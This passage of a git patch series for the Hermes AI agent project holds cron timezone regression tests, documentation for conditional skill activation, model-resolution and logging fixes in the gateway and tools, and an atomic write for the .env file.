  datetimes are normalized to Hermes tz without shifting the instant
- test_ensure_aware_due_job_not_skipped_when_system_ahead: end-to-end
  regression test for the original bug scenario
---
 tests/test_timezone.py | 79 ++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 79 insertions(+)

diff --git a/tests/test_timezone.py b/tests/test_timezone.py
index 3d657989..9902817d 100644
--- a/tests/test_timezone.py
+++ b/tests/test_timezone.py
@@ -249,6 +249,85 @@ class TestCronTimezone:
         due = get_due_jobs()
         assert len(due) == 1
 
+    def test_ensure_aware_naive_preserves_absolute_time(self):
+        """_ensure_aware must preserve the absolute instant for naive datetimes.
+
+        Regression: the old code used replace(tzinfo=hermes_tz) which shifted
+        absolute time when system-local tz != Hermes tz.  The fix interprets
+        naive values as system-local wall time, then converts.
+        """
+        from cron.jobs import _ensure_aware
+
+        os.environ["HERMES_TIMEZONE"] = "Asia/Kolkata"
+        hermes_time.reset_cache()
+
+        # Create a naive datetime — will be interpreted as system-local time
+        naive_dt = datetime(2026, 3, 11, 12, 0, 0)
+
+        result = _ensure_aware(naive_dt)
+
+        # The result should be in Kolkata tz
+        assert result.tzinfo is not None
+
+        # The UTC equivalent must match what we'd get by correctly interpreting
+        # the naive dt as system-local time first, then converting
+        system_tz = datetime.now().astimezone().tzinfo
+        expected_utc = naive_dt.replace(tzinfo=system_tz).astimezone(timezone.utc)
+        actual_utc = result.astimezone(timezone.utc)
+        assert actual_utc == expected_utc, (
+            f"Absolute time shifted: expected {expected_utc}, got {actual_utc}"
+        )
+
+    def test_ensure_aware_normalizes_aware_to_hermes_tz(self):
+        """Already-aware datetimes should be normalized to Hermes tz."""
+        from cron.jobs import _ensure_aware
+
+        os.environ["HERMES_TIMEZONE"] = "Asia/Kolkata"
+        hermes_time.reset_cache()
+
+        # Create an aware datetime in UTC
+        utc_dt = datetime(2026, 3, 11, 15, 0, 0, tzinfo=timezone.utc)
+        result = _ensure_aware(utc_dt)
+
+        # Must be in Hermes tz (Kolkata) but same absolute instant
+        kolkata = ZoneInfo("Asia/Kolkata")
+        assert result.utctimetuple()[:5] == (2026, 3, 11, 15, 0)
+        expected_local = utc_dt.astimezone(kolkata)
+        assert result == expected_local
+
+    def test_ensure_aware_due_job_not_skipped_when_system_ahead(self, tmp_path, monkeypatch):
+        """Reproduce the actual bug: system tz ahead of Hermes tz caused
+        overdue jobs to appear as not-yet-due.
+
+        Scenario: system is Asia/Kolkata (UTC+5:30), Hermes is UTC.
+        A naive timestamp from 5 minutes ago (local time) should still
+        be recognized as due after conversion.
+        """
+        import cron.jobs as jobs_module
+        monkeypatch.setattr(jobs_module, "CRON_DIR", tmp_path / "cron")
+        monkeypatch.setattr(jobs_module, "JOBS_FILE", tmp_path / "cron" / "jobs.json")
+        monkeypatch.setattr(jobs_module, "OUTPUT_DIR", tmp_path / "cron" / "output")
+
+        os.environ["HERMES_TIMEZONE"] = "UTC"
+        hermes_time.reset_cache()
+
+        from cron.jobs import create_job, load_jobs, save_jobs, get_due_jobs
+
+        job = create_job(prompt="Bug repro", schedule="every 1h")
+        jobs = load_jobs()
+
+        # Simulate a naive timestamp that was written by datetime.now() on a
+        # system running in UTC+5:30 — 5 minutes in the past (local time)
+        naive_past = (datetime.now() - timedelta(minutes=5)).isoformat()
+        jobs[0]["next_run_at"] = naive_past
+        save_jobs(jobs)
+
+        # Must be recognized as due regardless of tz mismatch
+        due = get_due_jobs()
+        assert len(due) == 1, (
+            "Overdue job was skipped — _ensure_aware likely shifted absolute time"
+        )
+
     def test_create_job_stores_tz_aware_timestamps(self, tmp_path, monkeypatch):
         """New jobs store timezone-aware created_at and next_run_at."""
         import cron.jobs as jobs_module

From 82113f1f1edd133251c38618bc541dd9361454c1 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 08:47:01 -0700
Subject: [PATCH 100/105] =?UTF-8?q?docs:=20conditional=20skill=20activatio?=
 =?UTF-8?q?n=20=E2=80=94=20tag=20duckduckgo-search=20as=20web=20fallback?=
 =?UTF-8?q?=20and=20add=20documentation?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

- Tag duckduckgo-search skill with fallback_for_toolsets: [web] so it
  auto-hides when Firecrawl is available and auto-shows when it isn't
- Add 'Conditional Activation' section to CONTRIBUTING.md with full
  spec, semantics, and examples for all 4 frontmatter fields
- Add 'Conditional Activation (Fallback Skills)' section to the user-
  facing skills docs with field reference table and practical example
- Update SKILL.md format examples in both docs to show the new fields

Follow-up to PR #785 (conditional skill activation feature).
---
 CONTRIBUTING.md                            | 44 ++++++++++++++++++++++
 skills/research/duckduckgo-search/SKILL.md |  1 +
 website/docs/user-guide/features/skills.md | 26 +++++++++++++
 3 files changed, 71 insertions(+)

diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index e66dbb3e..60e8706b 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -333,6 +333,8 @@ metadata:
   hermes:
     tags: [Category, Subcategory, Keywords]
     related_skills: [other-skill-name]
+    fallback_for_toolsets: [web]       # Optional — show only when toolset is unavailable
+    requires_toolsets: [terminal]      # Optional — show only when toolset is available
 ---
 
 # Skill Title
@@ -367,6 +369,48 @@ platforms: [windows]          # Windows only
 
 If the field is omitted or empty, the skill loads on all platforms (backward compatible). See `skills/apple/` for examples of macOS-only skills.
 
+### Conditional skill activation
+
+Skills can declare conditions that control when they appear in the system prompt, based on which tools and toolsets are available in the current session. This is primarily used for **fallback skills** — alternatives that should only be shown when a primary tool is unavailable.
+
+Four fields are supported under `metadata.hermes`:
+
+```yaml
+metadata:
+  hermes:
+    fallback_for_toolsets: [web]      # Show ONLY when these toolsets are unavailable
+    requires_toolsets: [terminal]     # Show ONLY when these toolsets are available
+    fallback_for_tools: [web_search]  # Show ONLY when these specific tools are unavailable
+    requires_tools: [terminal]        # Show ONLY when these specific tools are available
+```
+
+**Semantics:**
+- `fallback_for_*`: The skill is a backup. It is **hidden** when the listed tools/toolsets are available, and **shown** when they are unavailable. Use this for free alternatives to premium tools.
+- `requires_*`: The skill needs certain tools to function. It is **hidden** when the listed tools/toolsets are unavailable. Use this for skills that depend on specific capabilities (e.g., a skill that only makes sense with terminal access).
+- If both are specified, both conditions must be satisfied for the skill to appear.
+- If neither is specified, the skill is always shown (backward compatible).
+
+**Examples:**
+
+```yaml
+# DuckDuckGo search — shown when Firecrawl (web toolset) is unavailable
+metadata:
+  hermes:
+    fallback_for_toolsets: [web]
+
+# Smart home skill — only useful when terminal is available
+metadata:
+  hermes:
+    requires_toolsets: [terminal]
+
+# Local browser fallback — shown when Browserbase is unavailable
+metadata:
+  hermes:
+    fallback_for_toolsets: [browser]
+```
+
+The filtering happens at prompt build time in `agent/prompt_builder.py`. The `build_skills_system_prompt()` function receives the set of available tools and toolsets from the agent and uses `_skill_should_show()` to evaluate each skill's conditions.
+
 ### Skill guidelines
 
 - **No external dependencies unless absolutely necessary.** Prefer stdlib Python, curl, and existing Hermes tools (`web_extract`, `terminal`, `read_file`).
diff --git a/skills/research/duckduckgo-search/SKILL.md b/skills/research/duckduckgo-search/SKILL.md
index 6081581e..afe7858a 100644
--- a/skills/research/duckduckgo-search/SKILL.md
+++ b/skills/research/duckduckgo-search/SKILL.md
@@ -8,6 +8,7 @@ metadata:
   hermes:
     tags: [search, duckduckgo, web-search, free, fallback]
     related_skills: [arxiv]
+    fallback_for_toolsets: [web]
 ---
 
 # DuckDuckGo Search
diff --git a/website/docs/user-guide/features/skills.md b/website/docs/user-guide/features/skills.md
index 8eb838d2..8f02be20 100644
--- a/website/docs/user-guide/features/skills.md
+++ b/website/docs/user-guide/features/skills.md
@@ -55,6 +55,8 @@ metadata:
   hermes:
     tags: [python, automation]
     category: devops
+    fallback_for_toolsets: [web]    # Optional — conditional activation (see below)
+    requires_toolsets: [terminal]   # Optional — conditional activation (see below)
 ---
 
 # Skill Title
@@ -90,6 +92,30 @@ platforms: [macos, linux]     # macOS and Linux
 
 When set, the skill is automatically hidden from the system prompt, `skills_list()`, and slash commands on incompatible platforms. If omitted, the skill loads on all platforms.
 
+### Conditional Activation (Fallback Skills)
+
+Skills can automatically show or hide themselves based on which tools are available in the current session. This is most useful for **fallback skills** — free or local alternatives that should only appear when a premium tool is unavailable.
+
+```yaml
+metadata:
+  hermes:
+    fallback_for_toolsets: [web]      # Show ONLY when these toolsets are unavailable
+    requires_toolsets: [terminal]     # Show ONLY when these toolsets are available
+    fallback_for_tools: [web_search]  # Show ONLY when these specific tools are unavailable
+    requires_tools: [terminal]        # Show ONLY when these specific tools are available
+```
+
+| Field | Behavior |
+|-------|----------|
+| `fallback_for_toolsets` | Skill is **hidden** when the listed toolsets are available. Shown when they're missing. |
+| `fallback_for_tools` | Same, but checks individual tools instead of toolsets. |
+| `requires_toolsets` | Skill is **hidden** when the listed toolsets are unavailable. Shown when they're present. |
+| `requires_tools` | Same, but checks individual tools. |
+
+**Example:** The built-in `duckduckgo-search` skill uses `fallback_for_toolsets: [web]`. When you have `FIRECRAWL_API_KEY` set, the web toolset is available and the agent uses `web_search` — the DuckDuckGo skill stays hidden. If the API key is missing, the web toolset is unavailable and the DuckDuckGo skill automatically appears as a fallback.
+
+Skills without any conditional fields behave exactly as before — they're always shown.
+
 ## Skill Directory Structure
 
 ```

From 66c0b719de612af9b947f3f883a704982a3aace0 Mon Sep 17 00:00:00 2001
From: Dev User <dev@srv1457935.hstgr.cloud>
Date: Wed, 11 Mar 2026 00:09:37 +0100
Subject: [PATCH 101/105] fix(gateway): pass model to temporary AIAgent
 instances

Memory flush, /compress, and session hygiene create AIAgent without
model=, falling back to the hardcoded default "anthropic/claude-opus-4.6".
This fails with a 400 error when the active provider is openai-codex
(Codex only accepts its own model names like gpt-5.1-codex-mini).

Add _resolve_gateway_model() that mirrors the env/config resolution
already used by _run_agent_sync, and wire it into all three temporary
agent creation sites.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 gateway/run.py | 35 +++++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)

diff --git a/gateway/run.py b/gateway/run.py
index 96d43672..7e07d06b 100644
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -187,6 +187,30 @@ def _resolve_runtime_agent_kwargs() -> dict:
     }
 
 
+def _resolve_gateway_model() -> str:
+    """Read model from env/config — mirrors the resolution in _run_agent_sync.
+
+    Without this, temporary AIAgent instances (memory flush, /compress) fall
+    back to the hardcoded default ("anthropic/claude-opus-4.6") which fails
+    when the active provider is openai-codex.
+    """
+    model = os.getenv("HERMES_MODEL") or os.getenv("LLM_MODEL") or "anthropic/claude-opus-4.6"
+    try:
+        import yaml as _y
+        _cfg_path = _hermes_home / "config.yaml"
+        if _cfg_path.exists():
+            with open(_cfg_path, encoding="utf-8") as _f:
+                _cfg = _y.safe_load(_f) or {}
+            _model_cfg = _cfg.get("model", {})
+            if isinstance(_model_cfg, str):
+                model = _model_cfg
+            elif isinstance(_model_cfg, dict):
+                model = _model_cfg.get("default", model)
+    except Exception:
+        pass
+    return model
+
+
 class GatewayRunner:
     """
     Main gateway controller.
@@ -258,8 +282,14 @@ class GatewayRunner:
             if not runtime_kwargs.get("api_key"):
                 return
 
+            # Resolve model from config — AIAgent's default is OpenRouter-
+            # formatted ("anthropic/claude-opus-4.6") which fails when the
+            # active provider is openai-codex.
+            model = _resolve_gateway_model()
+
             tmp_agent = AIAgent(
                 **runtime_kwargs,
+                model=model,
                 max_iterations=8,
                 quiet_mode=True,
                 enabled_toolsets=["memory", "skills"],
@@ -1106,6 +1136,7 @@ class GatewayRunner:
                             if len(_hyg_msgs) >= 4:
                                 _hyg_agent = AIAgent(
                                     **_hyg_runtime,
+                                    model=_hyg_model,
                                     max_iterations=4,
                                     quiet_mode=True,
                                     enabled_toolsets=["memory"],
@@ -2169,6 +2200,9 @@ class GatewayRunner:
             if not runtime_kwargs.get("api_key"):
                 return "No provider configured -- cannot compress."
 
+            # Resolve model from config (same reason as memory flush above).
+            model = _resolve_gateway_model()
+
             msgs = [
                 {"role": m.get("role"), "content": m.get("content")}
                 for m in history
@@ -2179,6 +2213,7 @@ class GatewayRunner:
 
             tmp_agent = AIAgent(
                 **runtime_kwargs,
+                model=model,
                 max_iterations=4,
                 quiet_mode=True,
                 enabled_toolsets=["memory"],

From 3667138d05da6787ce7bb9e353fe8d74ecb36fd9 Mon Sep 17 00:00:00 2001
From: alireza78a <alireza78a@users.noreply.github.com>
Date: Wed, 11 Mar 2026 08:58:33 -0700
Subject: [PATCH 102/105] fix(config): atomic write for .env to prevent API key
 loss on crash
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

save_env_value() used bare open('w') which truncates .env immediately.
A crash or OOM kill between truncation and completed write silently
wipes every credential in the file.

Write now goes to a temp file first, then os.replace() swaps it
atomically. Either the old .env exists or the new one does — never
a truncated half-write. Same pattern used in cron/jobs.py.

Cherry-picked from PR #842 by alireza78a, rebased onto current main
with conflict resolution (_secure_file refactor).

Co-authored-by: alireza78a <alireza78a@users.noreply.github.com>
---
 hermes_cli/config.py | 16 ++++++++++++++--
 1 file changed, 14 insertions(+), 2 deletions(-)

diff --git a/hermes_cli/config.py b/hermes_cli/config.py
index 75811849..f2b5d42c 100644
--- a/hermes_cli/config.py
+++ b/hermes_cli/config.py
@@ -17,6 +17,7 @@ import platform
 import stat
 import subprocess
 import sys
+import tempfile
 from pathlib import Path
 from typing import Dict, Any, Optional, List, Tuple
 
@@ -958,8 +959,19 @@ def save_env_value(key: str, value: str):
             lines[-1] += "\n"
         lines.append(f"{key}={value}\n")
     
-    with open(env_path, 'w', **write_kw) as f:
-        f.writelines(lines)
+    fd, tmp_path = tempfile.mkstemp(dir=str(env_path.parent), suffix='.tmp', prefix='.env_')
+    try:
+        with os.fdopen(fd, 'w', **write_kw) as f:
+            f.writelines(lines)
+            f.flush()
+            os.fsync(f.fileno())
+        os.replace(tmp_path, env_path)
+    except BaseException:
+        try:
+            os.unlink(tmp_path)
+        except OSError:
+            pass
+        raise
     _secure_file(env_path)
 
     # Restrict .env permissions to owner-only (contains API keys)

From b66c8b409c715b1f50e200fac1a036f2e2907cad Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 08:58:56 -0700
Subject: [PATCH 103/105] fix(vision): log error when vision client is
 unavailable

Previously the early return for unconfigured vision model was silent.
Now logs an error so the failure is visible in logs for debugging.

Inspired by PR #839 by aydnOktay.

Co-authored-by: aydnOktay <aydnOktay@users.noreply.github.com>
---
 tools/vision_tools.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/tools/vision_tools.py b/tools/vision_tools.py
index d9105117..bfde51ec 100644
--- a/tools/vision_tools.py
+++ b/tools/vision_tools.py
@@ -259,6 +259,7 @@ async def vision_analyze_tool(
         
         # Check auxiliary vision client availability
         if _aux_async_client is None or DEFAULT_VISION_MODEL is None:
+            logger.error("Vision analysis unavailable: no auxiliary vision model configured")
             return json.dumps({
                 "success": False,
                 "analysis": "Vision analysis unavailable: no auxiliary vision model configured. "

From 01bec407245f2004bea0a0dc3ad35e2dfc97a502 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 08:59:09 -0700
Subject: [PATCH 104/105] refactor(gateway): consolidate model resolution via
 _resolve_gateway_model()

Replace two inline copies of the env/config model resolution pattern
(in _run_agent_sync and _run_agent) with the _resolve_gateway_model()
helper introduced in PR #830.

Left untouched:
- Session hygiene block: different default (sonnet vs opus) + reads
  compression config from the same YAML load
- /model command: also reads provider from same config block
---
 gateway/run.py | 33 +++------------------------------
 1 file changed, 3 insertions(+), 30 deletions(-)

diff --git a/gateway/run.py b/gateway/run.py
index 7e07d06b..3c2abd83 100644
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -2029,21 +2029,8 @@ class GatewayRunner:
                 )
                 return
 
-            # Read model from config (same as _run_agent)
-            model = os.getenv("HERMES_MODEL") or os.getenv("LLM_MODEL") or "anthropic/claude-opus-4.6"
-            try:
-                import yaml as _y
-                _cfg_path = _hermes_home / "config.yaml"
-                if _cfg_path.exists():
-                    with open(_cfg_path, encoding="utf-8") as _f:
-                        _cfg = _y.safe_load(_f) or {}
-                    _model_cfg = _cfg.get("model", {})
-                    if isinstance(_model_cfg, str):
-                        model = _model_cfg
-                    elif isinstance(_model_cfg, dict):
-                        model = _model_cfg.get("default", model)
-            except Exception:
-                pass
+            # Read model from config via shared helper
+            model = _resolve_gateway_model()
 
             # Determine toolset (same logic as _run_agent)
             default_toolset_map = {
@@ -3128,21 +3115,7 @@ class GatewayRunner:
             except Exception:
                 pass
 
-            model = os.getenv("HERMES_MODEL") or os.getenv("LLM_MODEL") or "anthropic/claude-opus-4.6"
-
-            try:
-                import yaml as _y
-                _cfg_path = _hermes_home / "config.yaml"
-                if _cfg_path.exists():
-                    with open(_cfg_path, encoding="utf-8") as _f:
-                        _cfg = _y.safe_load(_f) or {}
-                    _model_cfg = _cfg.get("model", {})
-                    if isinstance(_model_cfg, str):
-                        model = _model_cfg
-                    elif isinstance(_model_cfg, dict):
-                        model = _model_cfg.get("default", model)
-            except Exception:
-                pass
+            model = _resolve_gateway_model()
 
             try:
                 runtime_kwargs = _resolve_runtime_agent_kwargs()

From 91101065bb37cd170acd6bed0ab9e05e524e41a6 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 08:59:59 -0700
Subject: [PATCH 105/105] fix: improve git error logging in checkpoint manager

- Log command, return code, and stderr on non-zero exit
- Add exc_info=True to timeout, FileNotFoundError, and catch-all handlers
- Add debug field to restore() error responses with raw git output
- Keeps user-facing error messages clean while preserving detail for debugging

Inspired by PR #843 (aydnOktay).
---
 tools/checkpoint_manager.py | 23 ++++++++++++++++++-----
 1 file changed, 18 insertions(+), 5 deletions(-)

diff --git a/tools/checkpoint_manager.py b/tools/checkpoint_manager.py
index 57671c54..16ef69ea 100644
--- a/tools/checkpoint_manager.py
+++ b/tools/checkpoint_manager.py
@@ -95,21 +95,34 @@ def _run_git(
 ) -> tuple:
     """Run a git command against the shadow repo.  Returns (ok, stdout, stderr)."""
     env = _git_env(shadow_repo, working_dir)
+    cmd = ["git"] + list(args)
     try:
         result = subprocess.run(
-            ["git"] + args,
+            cmd,
             capture_output=True,
             text=True,
             timeout=timeout,
             env=env,
             cwd=str(Path(working_dir).resolve()),
         )
-        return result.returncode == 0, result.stdout.strip(), result.stderr.strip()
+        ok = result.returncode == 0
+        stdout = result.stdout.strip()
+        stderr = result.stderr.strip()
+        if not ok:
+            logger.error(
+                "Git command failed: %s (rc=%d) stderr=%s",
+                " ".join(cmd), result.returncode, stderr,
+            )
+        return ok, stdout, stderr
     except subprocess.TimeoutExpired:
-        return False, "", f"git timed out after {timeout}s: git {' '.join(args)}"
+        msg = f"git timed out after {timeout}s: {' '.join(cmd)}"
+        logger.error(msg, exc_info=True)
+        return False, "", msg
     except FileNotFoundError:
+        logger.error("Git executable not found: %s", " ".join(cmd), exc_info=True)
         return False, "", "git not found"
     except Exception as exc:
+        logger.error("Unexpected git error running %s: %s", " ".join(cmd), exc, exc_info=True)
         return False, "", str(exc)
 
 
@@ -287,7 +300,7 @@ class CheckpointManager:
             ["cat-file", "-t", commit_hash], shadow, abs_dir,
         )
         if not ok:
-            return {"success": False, "error": f"Checkpoint '{commit_hash}' not found"}
+            return {"success": False, "error": f"Checkpoint '{commit_hash}' not found", "debug": err or None}
 
         # Take a checkpoint of current state before restoring (so you can undo the undo)
         self._take(abs_dir, f"pre-rollback snapshot (restoring to {commit_hash[:8]})")
@@ -299,7 +312,7 @@ class CheckpointManager:
         )
 
         if not ok:
-            return {"success": False, "error": f"Restore failed: {err}"}
+            return {"success": False, "error": "Restore failed", "debug": err or None}
 
         # Get info about what was restored
         ok2, reason_out, _ = _run_git(